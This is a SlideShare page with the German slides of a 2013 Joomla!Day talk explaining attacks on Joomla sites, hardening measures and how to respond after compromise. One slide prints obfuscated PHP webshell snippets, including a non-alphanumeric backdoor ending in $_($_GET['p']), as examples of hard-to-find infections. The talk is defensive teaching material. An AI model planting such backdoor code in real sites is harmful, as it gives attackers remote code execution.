SlideShare uma empresa Scribd logo
1 de 24
Angriffe auf Joomla
verstehen und verhindern.
Simon Samtleben
Joomla!Day Deutschland 2013
www.yagendoo.com
Simon Samtleben
@lemmingzshadow
Webentwickler @ yagendoo Media GmbH in Köln
www.yagendoo.com | lemmingzshadow.net
● PHP Entwicklung
● Joomla
● Websockets
● Serveradministration
● Debian
● Nginx
● Security
● yagendoo.com
● gulli.com
● anonym.to
● 3gstore.de
● iphoneohnevertrag.de
Inhalt
1.Wie funktionieren Angriffe auf Joomla?
1. Schwachstellen finden.
2. System „infizieren“.
3. Warum werden (Joomla) Webseiten angegriffen?
2.Wie kann ich mein System schützen?
1. Serverseitig
2. Joomla
3.Was tun wenn mein System kompromittiert wurde?
Schwachstellen finden
● Bruteforceing
– Joomla
– SSH/(S)FTP
● Google Dorks
● Sicherheitslücken
– SQL Injection
– RFC, LFC
Bild: webroot.com
Schwachstellen finden
● Bruteforceing
– Joomla
– SSH/(S)FTP
● Google Dorks
● Sicherheitslücken
– SQL Injection
– RFC, LFC
Bild: webroot.com
Schwachstellen finden
● Bruteforceing
– Joomla
– SSH/(S)FTP
● Google Dorks
● Sicherheitslücken
– SQL Injection
– RFC, LFC
System infizieren
● Vollständig automatisiert
● Typische „Injections“
– Webshells
– Iframes
– Javascripts (Cookie Bombs, ...)
– Cloaking/Redirects
– Sonstiges (IRC Bots, ...)
Bild: webroot.com
Bild: webroot.com
Warum werden (Joomla)
Webseiten angegriffen?
● Verbreitung von Malware
● Aufbau von Botnets
● E-Mail Spam
● Backlinks / SEO
● Gezielte Angriffe
– Stehlen von Daten
Die Masse macht's
Inhalt
1.Wie funktionieren Angriffe auf Joomla?
1. Schwachstellen finden.
2. System „infizieren“.
3. Warum werden (Joomla) Webseiten angegriffen?
2.Wie kann ich mein System schützen?
1. Serverseitig
2. Joomla
3.Was tun wenn mein System kompromittiert wurde?
Serverseitige Schutzmaßnahmen
● Auto IP-Blacklisting
● SSH Login nur über Keys
● Chroot für Projekte
● SFTP statt FTP
● Eigene SQL Benutzer pro Projekt
● Monitoring (Last, Prozesse, Netzwerk, …)
● Updates, Updates, Updates
Joomlaseitige Schutzmaßnahmen
● Nicht benötigte Erweiterungen löschen
– Auch bei „Schutzsoftware“ vorsichtig sein
– Vorsicht bei lange nicht aktualisierten Erweiterungen
● Regelmäßig auf Infektionen prüfen
– urlquery.net
– virustotal.com
– myjoomla.com
– Extensions
Joomlaseitige Schutzmaßnahmen
● Regelmäßige Backup
– Akeeba Backup
– Duply, Rsync, Snapshots, …
– Auch alte Backups vorhalten!
● Updates, Updates, UPDATES!
– Joomla & Extensions
– Newsletter, Blogs, Auto-Update, ...
Inhalt
1.Wie funktionieren Angriffe auf Joomla?
1. Schwachstellen finden.
2. System „infizieren“.
3. Warum werden (Joomla) Webseiten angegriffen?
2.Wie kann ich mein System schützen?
1. Serverseitig
2. Joomla
3.Was tun wenn mein System kompromittiert wurde?
Was tun wenn mein System
kompromittiert wurde?
● Don't Panic
– Keine wichtige Spuren löschen.
– Backup anlegen.
● Wenn möglich: Neu aufsetzen.
● Wenn nicht: Backup einspielen.
● Sonst: „Infektionen“ beseitigen.
Was tun wenn mein System
kompromittiert wurde?
● Infektionen sind schwer zu finden
– Einfach
● eval(base64_decode('...'));
– Schwieriger
● $eva1tYidakBcVSjr =
$eva1tYldakBcVSjr(chr(2687.5*0.016),
$eva1fYlbakBcVSir);
– Hacker :)
● $_[]++;$_[]=$_._;$_=$_[$_[+_]];$___=$__=$_[++
$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++
$___.$___.++$_.$__.++$___; $_($_GET['p']);
Fragen?
www.yagendoo.com
lemmingzshadow.net
Vielen Dank für's Zuhören!

Mais conteúdo relacionado

Destaque

Royale Hochzeiten – die 10 schönsten Brautkleider
Royale Hochzeiten – die 10 schönsten BrautkleiderRoyale Hochzeiten – die 10 schönsten Brautkleider
Royale Hochzeiten – die 10 schönsten BrautkleiderStylight
 
SEO für Überlebende - webinale 2013
SEO für Überlebende - webinale 2013SEO für Überlebende - webinale 2013
SEO für Überlebende - webinale 2013André Scharf
 
LightSwitch und SQL Azure: Datengetriebene Anwendungen in Rekordzeit erstellen
LightSwitch und SQL Azure: Datengetriebene Anwendungen in Rekordzeit erstellenLightSwitch und SQL Azure: Datengetriebene Anwendungen in Rekordzeit erstellen
LightSwitch und SQL Azure: Datengetriebene Anwendungen in Rekordzeit erstellenAlexander Galkin
 
Empfehlungen der DataCite Business Practices Working Group - DataCite 2014
Empfehlungen der DataCite Business Practices Working Group - DataCite 2014Empfehlungen der DataCite Business Practices Working Group - DataCite 2014
Empfehlungen der DataCite Business Practices Working Group - DataCite 2014Frauke Ziedorn
 
Transit prestasi pelajar
Transit prestasi pelajarTransit prestasi pelajar
Transit prestasi pelajarnorazieyra
 
Roulette Permanenzen Juni 2013
Roulette Permanenzen Juni 2013  Roulette Permanenzen Juni 2013
Roulette Permanenzen Juni 2013 Leopold Friesen
 
20120315 mobile sig_mobile
20120315 mobile sig_mobile20120315 mobile sig_mobile
20120315 mobile sig_mobileFabian Schmid
 
Vortrag textiler schatten in sonnigen ländern
Vortrag textiler schatten in sonnigen ländernVortrag textiler schatten in sonnigen ländern
Vortrag textiler schatten in sonnigen ländernHubertus Poppinghaus
 
Platura_Woche7
Platura_Woche7Platura_Woche7
Platura_Woche7wuggi
 
Die wichtigsten digitalen Trends für Finanzdienstleister
Die wichtigsten digitalen Trends für FinanzdienstleisterDie wichtigsten digitalen Trends für Finanzdienstleister
Die wichtigsten digitalen Trends für Finanzdienstleisterergo Kommunikation
 
ASSEMBLEA GENERALE ANDIL 2014
ASSEMBLEA GENERALE ANDIL 2014ASSEMBLEA GENERALE ANDIL 2014
ASSEMBLEA GENERALE ANDIL 2014ANDIL_laterizi
 
Fashion Class of 2015 - D_s
Fashion Class of 2015 - D_sFashion Class of 2015 - D_s
Fashion Class of 2015 - D_sStylight
 
Befragung per iPad für Kliniken und Arztpraxen - HERR DER LAGE Consulting
Befragung per iPad für Kliniken und Arztpraxen - HERR DER LAGE ConsultingBefragung per iPad für Kliniken und Arztpraxen - HERR DER LAGE Consulting
Befragung per iPad für Kliniken und Arztpraxen - HERR DER LAGE Consultingherrderlage
 

Destaque (20)

Royale Hochzeiten – die 10 schönsten Brautkleider
Royale Hochzeiten – die 10 schönsten BrautkleiderRoyale Hochzeiten – die 10 schönsten Brautkleider
Royale Hochzeiten – die 10 schönsten Brautkleider
 
SEO für Überlebende - webinale 2013
SEO für Überlebende - webinale 2013SEO für Überlebende - webinale 2013
SEO für Überlebende - webinale 2013
 
LightSwitch und SQL Azure: Datengetriebene Anwendungen in Rekordzeit erstellen
LightSwitch und SQL Azure: Datengetriebene Anwendungen in Rekordzeit erstellenLightSwitch und SQL Azure: Datengetriebene Anwendungen in Rekordzeit erstellen
LightSwitch und SQL Azure: Datengetriebene Anwendungen in Rekordzeit erstellen
 
Empfehlungen der DataCite Business Practices Working Group - DataCite 2014
Empfehlungen der DataCite Business Practices Working Group - DataCite 2014Empfehlungen der DataCite Business Practices Working Group - DataCite 2014
Empfehlungen der DataCite Business Practices Working Group - DataCite 2014
 
Transit prestasi pelajar
Transit prestasi pelajarTransit prestasi pelajar
Transit prestasi pelajar
 
ORGANOGÉNESIS
ORGANOGÉNESISORGANOGÉNESIS
ORGANOGÉNESIS
 
Roulette Permanenzen Juni 2013
Roulette Permanenzen Juni 2013  Roulette Permanenzen Juni 2013
Roulette Permanenzen Juni 2013
 
VOLANTE
VOLANTEVOLANTE
VOLANTE
 
20120315 mobile sig_mobile
20120315 mobile sig_mobile20120315 mobile sig_mobile
20120315 mobile sig_mobile
 
Vortrag textiler schatten in sonnigen ländern
Vortrag textiler schatten in sonnigen ländernVortrag textiler schatten in sonnigen ländern
Vortrag textiler schatten in sonnigen ländern
 
Destructed magazine
Destructed magazineDestructed magazine
Destructed magazine
 
Platura_Woche7
Platura_Woche7Platura_Woche7
Platura_Woche7
 
Die wichtigsten digitalen Trends für Finanzdienstleister
Die wichtigsten digitalen Trends für FinanzdienstleisterDie wichtigsten digitalen Trends für Finanzdienstleister
Die wichtigsten digitalen Trends für Finanzdienstleister
 
ASSEMBLEA GENERALE ANDIL 2014
ASSEMBLEA GENERALE ANDIL 2014ASSEMBLEA GENERALE ANDIL 2014
ASSEMBLEA GENERALE ANDIL 2014
 
Whiteboard
WhiteboardWhiteboard
Whiteboard
 
Wünsche Politik
Wünsche PolitikWünsche Politik
Wünsche Politik
 
Dvd
DvdDvd
Dvd
 
MEP KOREA BROCHURE
MEP KOREA BROCHUREMEP KOREA BROCHURE
MEP KOREA BROCHURE
 
Fashion Class of 2015 - D_s
Fashion Class of 2015 - D_sFashion Class of 2015 - D_s
Fashion Class of 2015 - D_s
 
Befragung per iPad für Kliniken und Arztpraxen - HERR DER LAGE Consulting
Befragung per iPad für Kliniken und Arztpraxen - HERR DER LAGE ConsultingBefragung per iPad für Kliniken und Arztpraxen - HERR DER LAGE Consulting
Befragung per iPad für Kliniken und Arztpraxen - HERR DER LAGE Consulting
 

Semelhante a Joomla Security: Angriffe verstehen und verhindern (Joomladay 2013 Vortrag by yagendoo.com)

Vorsicht: Fallstricke in der digitalen Welt für den Handelsagenten
Vorsicht: Fallstricke in der digitalen Welt für den HandelsagentenVorsicht: Fallstricke in der digitalen Welt für den Handelsagenten
Vorsicht: Fallstricke in der digitalen Welt für den HandelsagentenMag.Natascha Ljubic
 
Joomlaplatform deutsch
Joomlaplatform deutschJoomlaplatform deutsch
Joomlaplatform deutschRobert Deutz
 
Die Top 5 Mythen der SAP Sicherheit
Die Top 5 Mythen der SAP SicherheitDie Top 5 Mythen der SAP Sicherheit
Die Top 5 Mythen der SAP SicherheitVirtual Forge
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application SecurityJonathan Weiss
 
Digitale Fallstricke für Handelsagenten
Digitale Fallstricke für HandelsagentenDigitale Fallstricke für Handelsagenten
Digitale Fallstricke für HandelsagentenMag.Natascha Ljubic
 
Website Performance
Website PerformanceWebsite Performance
Website Performanceskyfyre
 
2017 05 16_trend_micro_webinar_wanna_cry1_ppt
2017 05 16_trend_micro_webinar_wanna_cry1_ppt2017 05 16_trend_micro_webinar_wanna_cry1_ppt
2017 05 16_trend_micro_webinar_wanna_cry1_pptAndreas Pelka
 
WordPress Sicherheit
WordPress SicherheitWordPress Sicherheit
WordPress SicherheitDietmar Leher
 
Security Task Manager 2.0 erkennt Schwachstellen in Ihrem Browser und in Windows
Security Task Manager 2.0 erkennt Schwachstellen in Ihrem Browser und in WindowsSecurity Task Manager 2.0 erkennt Schwachstellen in Ihrem Browser und in Windows
Security Task Manager 2.0 erkennt Schwachstellen in Ihrem Browser und in WindowsNeuberSoftware
 
Rex - Infrastruktur als Code
Rex - Infrastruktur als CodeRex - Infrastruktur als Code
Rex - Infrastruktur als CodeJan Gehring
 
Rahmenbedingungen mobile security
Rahmenbedingungen mobile securityRahmenbedingungen mobile security
Rahmenbedingungen mobile securityPeter Teufl
 
Webinar: Online Security
Webinar: Online SecurityWebinar: Online Security
Webinar: Online Securitykuehlhaus AG
 
MongoDB: Security-Tipps gegen Hacker
MongoDB: Security-Tipps gegen HackerMongoDB: Security-Tipps gegen Hacker
MongoDB: Security-Tipps gegen HackerGregor Biswanger
 
Microsoft Cyber Security IT-Camp
Microsoft Cyber Security IT-CampMicrosoft Cyber Security IT-Camp
Microsoft Cyber Security IT-CampAlexander Benoit
 

Semelhante a Joomla Security: Angriffe verstehen und verhindern (Joomladay 2013 Vortrag by yagendoo.com) (18)

Web Applikations Security
Web Applikations SecurityWeb Applikations Security
Web Applikations Security
 
Vorsicht: Fallstricke in der digitalen Welt für den Handelsagenten
Vorsicht: Fallstricke in der digitalen Welt für den HandelsagentenVorsicht: Fallstricke in der digitalen Welt für den Handelsagenten
Vorsicht: Fallstricke in der digitalen Welt für den Handelsagenten
 
Joomlaplatform deutsch
Joomlaplatform deutschJoomlaplatform deutsch
Joomlaplatform deutsch
 
Die Top 5 Mythen der SAP Sicherheit
Die Top 5 Mythen der SAP SicherheitDie Top 5 Mythen der SAP Sicherheit
Die Top 5 Mythen der SAP Sicherheit
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
Digitale Fallstricke für Handelsagenten
Digitale Fallstricke für HandelsagentenDigitale Fallstricke für Handelsagenten
Digitale Fallstricke für Handelsagenten
 
XPages - The Basics
XPages - The BasicsXPages - The Basics
XPages - The Basics
 
Website Performance
Website PerformanceWebsite Performance
Website Performance
 
2017 05 16_trend_micro_webinar_wanna_cry1_ppt
2017 05 16_trend_micro_webinar_wanna_cry1_ppt2017 05 16_trend_micro_webinar_wanna_cry1_ppt
2017 05 16_trend_micro_webinar_wanna_cry1_ppt
 
WordPress Sicherheit
WordPress SicherheitWordPress Sicherheit
WordPress Sicherheit
 
Security Task Manager 2.0 erkennt Schwachstellen in Ihrem Browser und in Windows
Security Task Manager 2.0 erkennt Schwachstellen in Ihrem Browser und in WindowsSecurity Task Manager 2.0 erkennt Schwachstellen in Ihrem Browser und in Windows
Security Task Manager 2.0 erkennt Schwachstellen in Ihrem Browser und in Windows
 
Rex - Infrastruktur als Code
Rex - Infrastruktur als CodeRex - Infrastruktur als Code
Rex - Infrastruktur als Code
 
Rahmenbedingungen mobile security
Rahmenbedingungen mobile securityRahmenbedingungen mobile security
Rahmenbedingungen mobile security
 
Webinar: Online Security
Webinar: Online SecurityWebinar: Online Security
Webinar: Online Security
 
Joomla
JoomlaJoomla
Joomla
 
MongoDB: Security-Tipps gegen Hacker
MongoDB: Security-Tipps gegen HackerMongoDB: Security-Tipps gegen Hacker
MongoDB: Security-Tipps gegen Hacker
 
Symfony2 admin bundles
Symfony2 admin bundlesSymfony2 admin bundles
Symfony2 admin bundles
 
Microsoft Cyber Security IT-Camp
Microsoft Cyber Security IT-CampMicrosoft Cyber Security IT-Camp
Microsoft Cyber Security IT-Camp
 

Joomla Security: Angriffe verstehen und verhindern (Joomladay 2013 Vortrag by yagendoo.com)

  • 1. Angriffe auf Joomla verstehen und verhindern. Simon Samtleben Joomla!Day Deutschland 2013 www.yagendoo.com
  • 2. Simon Samtleben @lemmingzshadow Webentwickler @ yagendoo Media GmbH in Köln www.yagendoo.com | lemmingzshadow.net ● PHP Entwicklung ● Joomla ● Websockets ● Serveradministration ● Debian ● Nginx ● Security ● yagendoo.com ● gulli.com ● anonym.to ● 3gstore.de ● iphoneohnevertrag.de
  • 3. Inhalt 1.Wie funktionieren Angriffe auf Joomla? 1. Schwachstellen finden. 2. System „infizieren“. 3. Warum werden (Joomla) Webseiten angegriffen? 2.Wie kann ich mein System schützen? 1. Serverseitig 2. Joomla 3.Was tun wenn mein System kompromittiert wurde?
  • 4. Schwachstellen finden ● Bruteforceing – Joomla – SSH/(S)FTP ● Google Dorks ● Sicherheitslücken – SQL Injection – RFC, LFC
  • 6. Schwachstellen finden ● Bruteforceing – Joomla – SSH/(S)FTP ● Google Dorks ● Sicherheitslücken – SQL Injection – RFC, LFC
  • 8. Schwachstellen finden ● Bruteforceing – Joomla – SSH/(S)FTP ● Google Dorks ● Sicherheitslücken – SQL Injection – RFC, LFC
  • 9. System infizieren ● Vollständig automatisiert ● Typische „Injections“ – Webshells – Iframes – Javascripts (Cookie Bombs, ...) – Cloaking/Redirects – Sonstiges (IRC Bots, ...)
  • 12.
  • 13. Warum werden (Joomla) Webseiten angegriffen? ● Verbreitung von Malware ● Aufbau von Botnets ● E-Mail Spam ● Backlinks / SEO ● Gezielte Angriffe – Stehlen von Daten
  • 15. Inhalt 1.Wie funktionieren Angriffe auf Joomla? 1. Schwachstellen finden. 2. System „infizieren“. 3. Warum werden (Joomla) Webseiten angegriffen? 2.Wie kann ich mein System schützen? 1. Serverseitig 2. Joomla 3.Was tun wenn mein System kompromittiert wurde?
  • 16. Serverseitige Schutzmaßnahmen ● Auto IP-Blacklisting ● SSH Login nur über Keys ● Chroot für Projekte ● SFTP statt FTP ● Eigene SQL Benutzer pro Projekt ● Monitoring (Last, Prozesse, Netzwerk, …) ● Updates, Updates, Updates
  • 17. Joomlaseitige Schutzmaßnahmen ● Nicht benötigte Erweiterungen löschen – Auch bei „Schutzsoftware“ vorsichtig sein – Vorsicht bei lange nicht aktualisierten Erweiterungen ● Regelmäßig auf Infektionen prüfen – urlquery.net – virustotal.com – myjoomla.com – Extensions
  • 18. Joomlaseitige Schutzmaßnahmen ● Regelmäßige Backup – Akeeba Backup – Duply, Rsync, Snapshots, … – Auch alte Backups vorhalten! ● Updates, Updates, UPDATES! – Joomla & Extensions – Newsletter, Blogs, Auto-Update, ...
  • 19. Inhalt 1.Wie funktionieren Angriffe auf Joomla? 1. Schwachstellen finden. 2. System „infizieren“. 3. Warum werden (Joomla) Webseiten angegriffen? 2.Wie kann ich mein System schützen? 1. Serverseitig 2. Joomla 3.Was tun wenn mein System kompromittiert wurde?
  • 20.
  • 21. Was tun wenn mein System kompromittiert wurde? ● Don't Panic – Keine wichtige Spuren löschen. – Backup anlegen. ● Wenn möglich: Neu aufsetzen. ● Wenn nicht: Backup einspielen. ● Sonst: „Infektionen“ beseitigen.
  • 22. Was tun wenn mein System kompromittiert wurde? ● Infektionen sind schwer zu finden – Einfach ● eval(base64_decode('...')); – Schwieriger ● $eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir); – Hacker :) ● $_[]++;$_[]=$_._;$_=$_[$_[+_]];$___=$__=$_[++ $__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++ $___.$___.++$_.$__.++$___; $_($_GET['p']);
  • 24. Vielen Dank für's Zuhören!